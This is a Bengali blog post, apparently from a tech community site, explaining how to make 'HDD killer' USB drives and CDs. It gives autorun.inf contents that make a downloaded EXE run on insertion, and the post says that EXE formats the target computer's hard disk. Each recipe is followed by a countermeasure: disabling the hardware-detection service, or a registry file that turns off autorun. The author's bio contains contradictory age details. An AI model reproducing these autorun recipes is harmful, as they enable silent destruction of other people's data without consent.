বিদ্রঃ আগের টিউনটিতে কিছু সমস্যা থাকার কারনে টিউনটি পুঃরায় প্রকাশ করা হল ও আগের টিউনটি মুছে ফেলা হল এবং এই টিউনটি দ্বারা কেউ কোন প্রকার ক্ষতিগ্রস্ত হলে আমি দায়ী থাকব না কারন আমার আগের টিউনে আমি এর অনুমতি পেয়েছি।
HDD কিলার পেনড্রাইভ তৈরি করনঃ
এটি এমন একটি ট্রিকস য়ার মাধ্যমে কম্পিউটারের HDD পুরোপুরি ফরমেট করা যাবে কেবল মাএ পেনড্রাইভ বা সিডি প্রবেশ করিয়েই কোন প্রকার Comment না করেই। প্রথমে এখান থেকে.EXE ফাইলটি Download করুন। তারপর নোট প্যাড open করুন এবং লিখুনঃ
[autorun]
ShellExecute=filename.EXE
Label=description
UseAutoPlay=1
এবং Save করুন autorun.inf নামে All Programs দিয়ে।এবার autorun এবং .EXE ফাইল দুটি পেনড্রাইভ দ্বারা যে কোন কম্পিউটারে প্রবেশ করালেই সেই কম্পিউটারের HDD ফরমেট হবে।
প্রতিকারঃ এটি প্রতিকার করার জন্য বা এটা থেকে যে কোন কম্পিউটারকে রক্ষা করা জন্য নিচের টিপসটি দেখুনঃ
Start > Settings > Control panel > Administrative Tools > Services > Shell Herdware Detection(dule click) > Start up type > Disabled > Apply > Ok .এবার কম্পিউটার রিস্টার্ট করুন।
HDD কিলার সিডি তৈরি করনঃ
প্রথমে উপরের লিঙ্ক থেকে .EXE ফাইলটি Download করুন এবং নোট প্যাডে লিখুন
[autorun]
open=file name.EXE /Auto
এবং Save করুন autorun.inf নামে All Programs দিয়ে।এবার autorun এবং .EXE ফাইল দুটি সিডি রাইট করলেই এটি হবে একটি HDD কিলার সিডি।
প্রতিকারঃ সিডি অটোরান ডিজেবল করলে এটি আর কাজ করতে পারবে না।এ জন্য প্রথমে নোটপ্যাড খুলে নিচের কোড টাইপ করুন।
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun"=dword:00000000
এরপর DisableAutorun.reg নামে সেভ করুন। এবার সেভকৃত ফাইলটি ডাবল ক্লিক করলে একটি ডায়ালগ বক্স আসবে। Yes ক্লিক করুন। এরপর OK বাটনে ক্লিক করুন। এবার কম্পিউটার রিস্টার্ট করুন।
আশাকরি আপনাদের ভাল লাগবে আর ভাল লাগলে Comment করতে ভুলবেন না।আর একটি কথা,সবাই আমাকে প্রশ্ন করে আমি কিসে পড়ি আমি New10(Science) পড়ি। আমার বয়স ১৫বছর (Real Birthday 29-11-1994)
আমি আলমাস জামান। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 15 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 107 টি টিউন ও 1591 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 3 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
আমি আপনাদের আলমাস। ছোট বেলা থেকেই স্বপ্ন দেখতে ভালবাসি, তাই স্বপ্ন বাস্তবায়নে ছুটে বেড়াই অজানা অনেক দূরে। অনেক সময় স্বপ্ন খুঁজতে গিয়ে পথ হারিয়ে যাই তখন, বিস্তীর্ণ উজানে একলা হয়ে চিহ্ন একেঁ একেঁ পথ চিনে নেই...
ধন্যবাদ !! তবে চিত্র সহ দিলে সবাই সহজে বুঝতো।